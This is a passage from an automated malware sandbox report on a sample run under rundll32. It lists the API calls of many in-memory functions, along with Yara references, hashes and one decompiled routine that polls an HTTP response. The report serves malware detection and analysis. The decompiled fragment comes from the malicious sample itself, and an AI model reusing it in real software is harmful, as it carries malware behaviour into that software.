                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B5F01F
                                          • _strupr.NTDLL ref: 00B5F04A
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 00B5F057
                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 00B5F071
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ProcessThread$Window$CloseCurrentHandleOpen_struprlstrlen
                                          • String ID:
                                          • API String ID: 3831658075-0
                                          • Opcode ID: 5bb7d6467e698675b85e8bacb1fe2ead2e804c92514753109f3b1306f52fbc1a
                                          • Instruction ID: b100485489b861aa6e8a2ddf975d296efdfd4129b21b2c4025cc5e44a51364dd
                                          • Opcode Fuzzy Hash: 5bb7d6467e698675b85e8bacb1fe2ead2e804c92514753109f3b1306f52fbc1a
                                          • Instruction Fuzzy Hash: B2416371900219EFDF219FA4CC49BEDBBB8EF44701F1844E6E915A3191DB749A84DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B57E45 Relevance: 10.6, APIs: 7, Instructions: 111memoryfilestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InterlockedIncrement.KERNEL32(00B7908C), ref: 00B57E57
                                          • lstrcpy.KERNEL32(00000000), ref: 00B57E93
                                            • Part of subcall function 00B5ADF8: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,00B6A2DC,?,00000000,-00000007,00B6377E,-00000007,?,00000000), ref: 00B5AE07
                                            • Part of subcall function 00B5ADF8: mbstowcs.NTDLL ref: 00B5AE23
                                          • GetLastError.KERNEL32(00000000), ref: 00B57F22
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B57F39
                                          • InterlockedDecrement.KERNEL32(00B7908C), ref: 00B57F50
                                          • DeleteFileA.KERNEL32(00000000), ref: 00B57F71
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B57F81
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666CE
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666E7
                                            • Part of subcall function 00B666BC: GetCurrentThreadId.KERNEL32 ref: 00B666F4
                                            • Part of subcall function 00B666BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B66700
                                            • Part of subcall function 00B666BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B6670E
                                            • Part of subcall function 00B666BC: lstrcpy.KERNEL32(00000000), ref: 00B66730
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
                                          • String ID:
                                          • API String ID: 908044853-0
                                          • Opcode ID: 6447758d77d6f4373b680673c29cc53c5a1026ff25a45b509320c56f47701cad
                                          • Instruction ID: 121dafa82c0f94f2fbfaec22b0c3474883f4ab559038d715147735ab0bc119a4
                                          • Opcode Fuzzy Hash: 6447758d77d6f4373b680673c29cc53c5a1026ff25a45b509320c56f47701cad
                                          • Instruction Fuzzy Hash: 4231E432A44254EBCB11AFA4EC84BAD7AF8EB44752F2140E5FE09E7150DF748E85CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B541F7 Relevance: 10.6, APIs: 7, Instructions: 110memoryfileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666CE
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666E7
                                            • Part of subcall function 00B666BC: GetCurrentThreadId.KERNEL32 ref: 00B666F4
                                            • Part of subcall function 00B666BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B66700
                                            • Part of subcall function 00B666BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B6670E
                                            • Part of subcall function 00B666BC: lstrcpy.KERNEL32(00000000), ref: 00B66730
                                          • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 00B5423D
                                          • StrTrimA.SHLWAPI(?,?), ref: 00B5425B
                                          • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 00B542C4
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 00B542E5
                                          • DeleteFileA.KERNEL32(?,00003219), ref: 00B54307
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B54316
                                          • HeapFree.KERNEL32(00000000,?,00003219), ref: 00B5432E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                                          • String ID:
                                          • API String ID: 1078934163-0
                                          • Opcode ID: 537fa9aa9fd551ba0445b97f707805a923b65d66614f95703ecf912c7f24e2fb
                                          • Instruction ID: 569e04b1d83468bf105074db98be0fa32df985826c1cf82ad8d251cef8437b2e
                                          • Opcode Fuzzy Hash: 537fa9aa9fd551ba0445b97f707805a923b65d66614f95703ecf912c7f24e2fb
                                          • Instruction Fuzzy Hash: AD310532104219BFE710EB64DC04F6B77E8EF45706F050498FA48E7160DB65ED89CBA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B60148 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00B6043C,00000000), ref: 00B60162
                                          • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 00B60177
                                          • memset.NTDLL ref: 00B60184
                                          • HeapFree.KERNEL32(00000000,00000000,?,00B6043B,?,?,00000000,?,00000000,00B67364,?,00000000), ref: 00B601A1
                                          • memcpy.NTDLL(?,?,00B6043B,?,00B6043B,?,?,00000000,?,00000000,00B67364,?,00000000), ref: 00B601C2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Allocate$Freememcpymemset
                                          • String ID: chun
                                          • API String ID: 2362494589-3058818181
                                          • Opcode ID: 619a1ec7b4b9a0f57766fb127e4d8cc6ba8b18d9ad53ad08bf9f5110487ce0a4
                                          • Instruction ID: 0eb0cc8636822327441a03154d4eee785d3b238a755ff2f7dba3001be178fce2
                                          • Opcode Fuzzy Hash: 619a1ec7b4b9a0f57766fb127e4d8cc6ba8b18d9ad53ad08bf9f5110487ce0a4
                                          • Instruction Fuzzy Hash: 10318C71200706AFDB309F66DC84A67BBECEF55310F0184AAF94AD7621DB70E945CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04895F21 Relevance: 10.6, APIs: 7, Instructions: 92networksynchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04895F21(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E04894DF6(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E04894C73(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E04893A6F( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}














                                          0x04895f21
                                          0x04895f21
                                          0x04895f31
                                          0x04895f34
                                          0x04895f38
                                          0x04895f3e
                                          0x04895f43
                                          0x04895f5c
                                          0x04895f70
                                          0x04895f77
                                          0x04895f7e
                                          0x04895fd1
                                          0x04895fd7
                                          0x04895fdd
                                          0x04896018
                                          0x0489601e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04895fdd
                                          0x04895f84
                                          0x00000000
                                          0x04895f8b
                                          0x04895f99
                                          0x04895f9c
                                          0x04895f9f
                                          0x04895fab
                                          0x04895faf
                                          0x04896011
                                          0x04895fb1
                                          0x04895fc3
                                          0x04896001
                                          0x0489600c
                                          0x04895fc5
                                          0x04895fc8
                                          0x04895fcc
                                          0x04895fcc
                                          0x04895fc3
                                          0x00000000
                                          0x04895faf
                                          0x04895f84
                                          0x04895f48
                                          0x04895f4e
                                          0x04895f51
                                          0x04895f56
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04895fe6
                                          0x04895fee
                                          0x04895ff3
                                          0x04895ff6
                                          0x00000000

                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,76DC81D0), ref: 04895F38
                                          • SetEvent.KERNEL32(?), ref: 04895F48
                                          • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04895F7A
                                          • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04895F9F
                                          • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04895FBF
                                          • GetLastError.KERNEL32 ref: 04895FD1
                                            • Part of subcall function 04893A6F: WaitForMultipleObjects.KERNEL32(00000002,04897B35,00000000,04897B35,?,?,?,04897B35,0000EA60), ref: 04893A8A
                                            • Part of subcall function 04894C73: RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
                                          • GetLastError.KERNEL32(00000000), ref: 04896006
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                          • String ID:
                                          • API String ID: 3369646462-0
                                          • Opcode ID: 9d39a1a330f85ff051b0f9b30beb39d6779fe6cf543cbea42f0e9f0bd634067c
                                          • Instruction ID: 5517b4c15f19345898544039f4f8e4924a9b4fce6ade04d8d8fbf08f6181e396
                                          • Opcode Fuzzy Hash: 9d39a1a330f85ff051b0f9b30beb39d6779fe6cf543cbea42f0e9f0bd634067c
                                          • Instruction Fuzzy Hash: B1310EB5900B09FFDF21EFA5C8C499EB7F8EB08314F144E69E502E2241E771AE499B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B543CF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91memoryfilestringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666CE
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666E7
                                            • Part of subcall function 00B666BC: GetCurrentThreadId.KERNEL32 ref: 00B666F4
                                            • Part of subcall function 00B666BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B66700
                                            • Part of subcall function 00B666BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B6670E
                                            • Part of subcall function 00B666BC: lstrcpy.KERNEL32(00000000), ref: 00B66730
                                          • lstrlen.KERNEL32(00000000,?,00000F00), ref: 00B543F3
                                            • Part of subcall function 00B5B865: lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,00B54417,?,00000000,000000FF,?,00000F00), ref: 00B5B876
                                            • Part of subcall function 00B5B865: lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,00B54417,?,00000000,000000FF,?,00000F00), ref: 00B5B87D
                                            • Part of subcall function 00B5B865: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 00B5B88F
                                            • Part of subcall function 00B5B865: _snprintf.NTDLL ref: 00B5B8B5
                                            • Part of subcall function 00B5B865: _snprintf.NTDLL ref: 00B5B8E9
                                            • Part of subcall function 00B5B865: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 00B5B906
                                          • StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,000000FF,?,00000F00), ref: 00B5448D
                                          • HeapFree.KERNEL32(00000000,?,000000FF,?,00000F00), ref: 00B544AA
                                          • DeleteFileA.KERNEL32(00000000,00000000,?,?,?,00000000,000000FF,?,00000F00), ref: 00B544B2
                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF,?,00000F00), ref: 00B544C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
                                          • String ID: s:
                                          • API String ID: 2960378068-2363032815
                                          • Opcode ID: 3a93056fe9d4302c28e5245c93ca33bc6313bc720cce597822e588607e0a3eba
                                          • Instruction ID: e8d4ac59a676c9f9eeb941e74db8faadb62d793ec2a25ad3f51871872374fbf2
                                          • Opcode Fuzzy Hash: 3a93056fe9d4302c28e5245c93ca33bc6313bc720cce597822e588607e0a3eba
                                          • Instruction Fuzzy Hash: A6314D72900209AFDF10ABE9DC84FDE7BECEB08316F000595FA19E3251EB749A448B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B613CC Relevance: 10.6, APIs: 7, Instructions: 83stringfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 00B613E2
                                          • lstrcmpiW.KERNEL32(00000000,?), ref: 00B6141A
                                          • lstrcmpiW.KERNEL32(?,?), ref: 00B6142F
                                          • lstrlenW.KERNEL32(?), ref: 00B61436
                                          • CloseHandle.KERNEL32(?), ref: 00B6145E
                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 00B6148A
                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 00B614A8
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                                          • String ID:
                                          • API String ID: 1496873005-0
                                          • Opcode ID: f58e599a6052f834873ad1bd214481767f20cedb5843209fbcc5adad630a792b
                                          • Instruction ID: 7d0f6e48cc02af35f9cc2be4b0993165e623aed33e4b5b65ac3a4f03fa423f92
                                          • Opcode Fuzzy Hash: f58e599a6052f834873ad1bd214481767f20cedb5843209fbcc5adad630a792b
                                          • Instruction Fuzzy Hash: D0212A71900205BFEB209FA9DC88EAA77FCEF14341B0848A4EA06A3221DF35DD458F60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6A806 Relevance: 10.6, APIs: 7, Instructions: 76memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(00B61B23,00000000,00B79440,00B79460,?,?,00B61B23,00B6C387,00B79440), ref: 00B6A816
                                          • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 00B6A82C
                                          • lstrlen.KERNEL32(00B6C387,?,?,00B61B23,00B6C387,00B79440), ref: 00B6A834
                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B6A840
                                          • lstrcpy.KERNEL32(00B79440,00B61B23), ref: 00B6A856
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00B61B23,00B6C387,00B79440), ref: 00B6A8AA
                                          • HeapFree.KERNEL32(00000000,00B79440,?,?,00B61B23,00B6C387,00B79440), ref: 00B6A8B9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateFreelstrlen$lstrcpy
                                          • String ID:
                                          • API String ID: 1531811622-0
                                          • Opcode ID: 32303d7455df91f2029957c1f6a91adc8c37a82b200c7a4fc84560710e9e06a3
                                          • Instruction ID: abd441f73fa84f79f37b19fbcb0102afc2b152deba63a262cacff793e12c6011
                                          • Opcode Fuzzy Hash: 32303d7455df91f2029957c1f6a91adc8c37a82b200c7a4fc84560710e9e06a3
                                          • Instruction Fuzzy Hash: E4210B35104244BFFF124F68DC84FAA7FAAEF86310F144099F949A7261CB359C86CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B62C84 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(00000000,?,?,?), ref: 00B62CA8
                                            • Part of subcall function 00B599C2: lstrcpy.KERNEL32(-000000FC,00000000), ref: 00B599FC
                                            • Part of subcall function 00B599C2: CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00002365), ref: 00B59A0E
                                            • Part of subcall function 00B599C2: GetTickCount.KERNEL32 ref: 00B59A19
                                            • Part of subcall function 00B599C2: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,?,00002365), ref: 00B59A25
                                            • Part of subcall function 00B599C2: lstrcpy.KERNEL32(00000000), ref: 00B59A3F
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • lstrcpy.KERNEL32(00000000), ref: 00B62CE3
                                          • wsprintfA.USER32 ref: 00B62CF6
                                          • GetTickCount.KERNEL32 ref: 00B62D0B
                                          • wsprintfA.USER32 ref: 00B62D20
                                            • Part of subcall function 00B5C6B8: RtlFreeHeap.NTDLL(00000000,00000000,00B71A9A,00000000), ref: 00B5C6C4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
                                          • String ID: "%S"
                                          • API String ID: 1152860224-1359967185
                                          • Opcode ID: f8d4a012629ae603c0b627af8cf1e0e17cf838851278b70345dc038d39afd8f1
                                          • Instruction ID: df51e5d7e5390e658aa9e668fd9589c20588e7811f6937a1541c36e9eb9c9ebc
                                          • Opcode Fuzzy Hash: f8d4a012629ae603c0b627af8cf1e0e17cf838851278b70345dc038d39afd8f1
                                          • Instruction Fuzzy Hash: 9F11E172501215BFD200BBA89C49E6F7BDCDF45716B054495FE08A7252CF78DD0487B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B56434 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B539E2: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B539EE
                                            • Part of subcall function 00B539E2: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00B53A04
                                            • Part of subcall function 00B539E2: _snwprintf.NTDLL ref: 00B53A29
                                            • Part of subcall function 00B539E2: CreateFileMappingW.KERNEL32(000000FF,00B79208,00000004,00000000,00001000,?,?,54D38000,00000192), ref: 00B53A45
                                            • Part of subcall function 00B539E2: GetLastError.KERNEL32 ref: 00B53A57
                                            • Part of subcall function 00B539E2: CloseHandle.KERNEL32(00000000), ref: 00B53A8F
                                          • UnmapViewOfFile.KERNEL32(?), ref: 00B5646F
                                          • CloseHandle.KERNEL32(?), ref: 00B56478
                                          • SetEvent.KERNEL32(?), ref: 00B564BF
                                          • GetLastError.KERNEL32(00B5EC0C,00000000,00000000), ref: 00B564EE
                                          • CloseHandle.KERNEL32(00000000,00B5EC0C,00000000,00000000), ref: 00B564FE
                                            • Part of subcall function 00B65F3B: lstrlenW.KERNEL32(?,74DB06E0,00B72F1B,80000001,?,?,00B5C229,?,?,00B540AD,00000000,?,00000000,?), ref: 00B65F47
                                            • Part of subcall function 00B65F3B: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,00B5C229,?,?,00B540AD,00000000,?,00000000,?), ref: 00B65F6F
                                            • Part of subcall function 00B65F3B: memset.NTDLL ref: 00B65F81
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                                          • String ID: v
                                          • API String ID: 1106445334-1801730948
                                          • Opcode ID: e340d34bfd6d60ee6e2084d21199d2175a3ea29cb6cdc76c2d973534f13240cf
                                          • Instruction ID: 27cd018a7d15bfcd15e6a6beaa0ed3abee76b26442f3cd91ef6ca4d863a0f429
                                          • Opcode Fuzzy Hash: e340d34bfd6d60ee6e2084d21199d2175a3ea29cb6cdc76c2d973534f13240cf
                                          • Instruction Fuzzy Hash: 6721A571600605AFEB11AFB4DC45B5A77E8EF01362B5105E8FA46E3260EF74ED85CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B56371 Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666CE
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666E7
                                            • Part of subcall function 00B666BC: GetCurrentThreadId.KERNEL32 ref: 00B666F4
                                            • Part of subcall function 00B666BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B66700
                                            • Part of subcall function 00B666BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B6670E
                                            • Part of subcall function 00B666BC: lstrcpy.KERNEL32(00000000), ref: 00B66730
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00001ED2,00000000,000000B7,?,00000001,00B57F67,00000000,00000000,00000011), ref: 00B563B2
                                          • HeapFree.KERNEL32(00000000,00000000,00001ED2,00000000,000000B7,?,00000001,00B57F67,00000000,00000000,00000011), ref: 00B56425
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                                          • String ID:
                                          • API String ID: 2078930461-0
                                          • Opcode ID: 3da28b6c17c349239c96bfd000071edcb7fab5541cb10805d9909dd2e8304ca7
                                          • Instruction ID: bbcf6f349dba940dbffe6afd4a4bad9a1ef1c66f78f3c870cc0fbb2ddf66a2f1
                                          • Opcode Fuzzy Hash: 3da28b6c17c349239c96bfd000071edcb7fab5541cb10805d9909dd2e8304ca7
                                          • Instruction Fuzzy Hash: 9411E731141214BBD6312B75EC8DFAF3F9CEB46763F104561FB0A972A1DF6248D886A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5A1EA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B6684C: lstrlen.KERNEL32(00000000,00000000,7477C740,76DC81D0,?,?,?,00B5A203,?,00000000,76DC81D0,?,?,00B5ACCC,00000000,0614C310), ref: 00B668B3
                                            • Part of subcall function 00B6684C: sprintf.NTDLL ref: 00B668D4
                                          • lstrlen.KERNEL32(00000000,7477C740,?,00000000,76DC81D0,?,?,00B5ACCC,00000000,0614C310), ref: 00B5A215
                                          • lstrlen.KERNEL32(?,?,?,00B5ACCC,00000000,0614C310), ref: 00B5A21D
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • strcpy.NTDLL ref: 00B5A234
                                          • lstrcat.KERNEL32(00000000,?), ref: 00B5A23F
                                            • Part of subcall function 00B52644: lstrlen.KERNEL32(?,?,?), ref: 00B52655
                                            • Part of subcall function 00B5C6B8: RtlFreeHeap.NTDLL(00000000,00000000,00B71A9A,00000000), ref: 00B5C6C4
                                          • StrTrimA.SHLWAPI(00000000,=,00000000,?,?,00B5ACCC,00000000,0614C310), ref: 00B5A25C
                                            • Part of subcall function 00B6E5A9: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00B5A268,00000000,?,?,00B5ACCC,00000000,0614C310), ref: 00B6E5B3
                                            • Part of subcall function 00B6E5A9: _snprintf.NTDLL ref: 00B6E611
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                          • String ID: =
                                          • API String ID: 2864389247-1428090586
                                          • Opcode ID: 2bd2a2b79de21bf3530e066b5246924c1395fbef6e9655f94bdcae5d0d65d3c5
                                          • Instruction ID: 0194aead19814648c4d895f14d43b0ce5ea3cd8daa919bc5da129996a49b9a2b
                                          • Opcode Fuzzy Hash: 2bd2a2b79de21bf3530e066b5246924c1395fbef6e9655f94bdcae5d0d65d3c5
                                          • Instruction Fuzzy Hash: D21102339012257B4A127BB89C86D6F3BEDDE8975630541D6FE08AB202DF3ACD0647E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6E863 Relevance: 10.6, APIs: 7, Instructions: 67threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SwitchToThread.KERNEL32(?,?,00B63ED5), ref: 00B6E88E
                                          • CloseHandle.KERNEL32(?,?,00B63ED5), ref: 00B6E89A
                                          • CloseHandle.KERNEL32(00000000,76DDF720,?,00B54545,00000000,?,?,?,00B63ED5), ref: 00B6E8AC
                                          • memset.NTDLL ref: 00B6E8C3
